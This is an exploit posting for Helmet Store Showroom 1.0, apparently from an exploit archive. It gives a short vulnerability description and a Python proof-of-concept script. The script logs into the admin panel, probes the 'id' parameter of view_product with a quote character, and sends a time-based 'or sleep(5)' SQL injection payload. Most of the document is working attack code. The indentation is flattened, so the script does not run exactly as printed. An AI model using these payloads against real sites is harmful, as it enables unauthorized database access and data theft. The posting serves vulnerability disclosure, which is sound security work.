Helmet Store Showroom 1.0 SQL Injection

Helmet Store Showroom version 1.0 suffers from an authenticated remote SQL injection vulnerability.


SHA-256 | 3e66b115ba8748f4ad2101302dc9ed47242e049cd2dfe657bde160d836d22cee

# Exploit Title: Helmet Store Showroom  1.0 - authenticated SQL Injection
# Date: 25-11-2022
# Exploit Author: syad
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html
# Version: 1.0
# Tested on: Windows 10 + XAMPP 3.2.4
# CVE ID : N/A

# Description

# The id parameter does not perform input validation on the view_product.php file it allow authenticated Time Based SQL Injection.


import requests
import sys
import pyfiglet
sess = requests.Session()


proxies = {"https": "https://127.0.0.1:8080", "http": "http://127.0.0.1:8080"}

def login1(ip,username,password):
x = "http://%s/hss/classes/Login.php?f=login" % ip
login = {'username':username, 'password':password}
r = sess.post(x, data=login, proxies=proxies)
#print(r.content)



def login(ip):
x = ("http://%s/hss/admin") % ip
r = sess.get(x,proxies=proxies)
if "Welcome to Helmet Store Showroom - PHP" in r.text:
print("--------------------------------------------")
print("[+] Success Login")


def detect_sql(ip):
x = "http://%s/hss/admin/?page=products/view_product&id=2'" % ip
r = sess.get(x,proxies=proxies)
if "You have an error in your SQL syntax" in r.text:
print("[+] Found SQL Error")


def time_based_sqli(ip):
x = "http://%s/hss/admin/?page=products/view_product&id=2'+or+sleep(5)--+-" % ip
r = sess.get(x,proxies=proxies)
print("[+] Time Based SQL Found")
print("[*]!!! Time To Report !!!")






if __name__ == "__main__":
result = pyfiglet.figlet_format("PWN")
print(result)
try:
ip = sys.argv[1].strip()
username = sys.argv[2].strip()
password = sys.argv[3].strip()
except IndexError:
print("[-] Usage %s <ip> <username> <password>" % sys.argv[0])
print("[-] Example: %s 192.168.1.x" % sys.argv[0])
sys.exit(-1)

login1(ip,username,password)
login(ip)
detect_sql(ip)
time_based_sqli(ip)

Related Posts